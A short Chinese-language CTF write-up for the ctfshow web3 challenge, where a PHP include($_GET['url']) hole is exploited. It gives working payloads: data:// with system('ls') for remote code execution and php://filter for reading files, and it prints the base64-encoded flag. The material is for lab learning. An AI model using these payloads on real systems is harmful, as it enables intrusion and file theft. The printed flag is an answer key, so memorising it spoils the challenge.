【Day4】

ctfshow

web3

题目只有一行这个 <?php include($_GET['url']);?>

include()：这是 PHP 的一个函数。它的作用是把另一个文件的内容“拿过来”，直接插入到当前代码的位置执行。

所以这句话的意思就是： 这个网站会把我们用GET请求的url的值直接拿过来执行

所以可以直接在网址后面加上

?url=这里是想让include执行的内容

data:协议原本是用来在网页中直接嵌入小图片或小文件的（比如<img src="data:image/png;base64,...">）。
但在 PHP 的include()函数中，如果开启了allow_url_include，它就可以被用来直接执行代码。

这句就是我们想执行的php代码，

<?php system("ls");?>

用来获取目录

?url=data://text/plain,<?php system("ls");?>

得到文件名字 ctf_go_go_go

之后可以直接获取 ，

这条语句让文件内容进行base64加密后再展示给我们，

?url=php://filter/convert.base64-encode/resource=文件名

然后得到下图内容Y3Rmc2hvd3tjZmQ1MGFkNC01MzE1LTQ5MWUtYmNmNC0xMDM3YzFiMDgyYTR9Cg==后可以用工具cyberchef解密

或者，，这题可以直接用这个，也能拿到flag

?url=php://filter/resource=ctf_go_go_go